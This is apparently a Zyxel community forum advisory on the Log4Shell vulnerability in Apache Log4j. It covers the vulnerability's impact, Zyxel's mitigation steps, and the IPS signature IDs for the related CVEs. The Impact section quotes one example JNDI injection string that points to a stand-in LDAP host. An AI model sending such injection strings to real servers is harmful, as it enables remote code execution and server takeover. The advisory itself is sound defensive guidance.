Guard against Log4Shell
Zyxel Employee
What is Vulnerable Log4j Package?
Log4j is an open-source project that is widely used for logging in JAVA. Log4j was found a remote code injection in the version between 2.x.x and 2.14.x. (However, a new exploit for log4j, CVE-2021-45046, was also found in 2.15. We recommend to update to the version 2.17). That allows attackers to send a special-formed command to get the remote shell (Log4shell) easily.
Impact
This vulnerability got the highest score (10) in CVSS since the log4j package is widely used and the vulnerability can be executed remotely. If the server is vulnerable, attackers can send commands (such as $jndi:ldap://example.com/a) to the log4j package and get the shell to take over the server. As the host is compromised, the host could be used as a bot, miner or encrypted your important files by ransomware.
Zyxel Security Appliances Against for Log4Shell
Zyxel is aware of remote code execution (RCE) vulnerabilities in Apache Log4j and confirms that all its security products are NOT affected [1]. Zyxel ATP/USG FLEX/USG Series firewalls provide multiple layer protection to help you against the attack.
Mitigation
1. On host: Recommend to update to the latest version of Apache Log4j (>=2.17.0).
2. On Network:
- To reduce the attack surface, don’t publish the vulnerable applications to Internet unless it's absolutely necessary. Leveraging the VPN technology for remote access to the applications.
- Update to the latest version of IPS signature and then enable the IPS function to protect your host. If your host uses SSL/TLS transmission, you should also enable SSL inspection for further detection. When the attack comes from the malicious IP address, the IP reputation feature defenses you against the attack from the IP address.
- Enable DNS filter, URL filter, Content Filter, AntiVirus and Sanbox features can also break the attack chain to avoid further infection.
Please refer to the signature information
ATP/USG FLEX/USG series:
v4.0.x.20211217.0
# Signature ID 131026, 131027 and 131028 are used for CVE-2021-44228.
# Signature ID 131029 and 131030 are used for CVE-2021-45046.
Reference
[1] Zyxel security advisory for Apache Log4j RCE vulnerabilities, https://www.zyxel.com/support/Zyxel_security_advisory_for_Apache_Log4j_RCE_vulnerability.shtml
Revision history
2021-12-17: Initial release
Categories
- All Categories
- 415 Beta Program
- 2.4K Nebula
- 144 Nebula Ideas
- 94 Nebula Status and Incidents
- 5.6K Security
- 237 USG FLEX H Series
- 267 Security Ideas
- 1.4K Switch
- 71 Switch Ideas
- 1.1K Wireless
- 40 Wireless Ideas
- 6.3K Consumer Product
- 247 Service & License
- 384 News and Release
- 83 Security Advisories
- 29 Education Center
- 10 [Campaign] Zyxel Network Detective
- 3.2K FAQ
- 34 Documents
- 34 Nebula Monthly Express
- 83 About Community
- 71 Security Highlight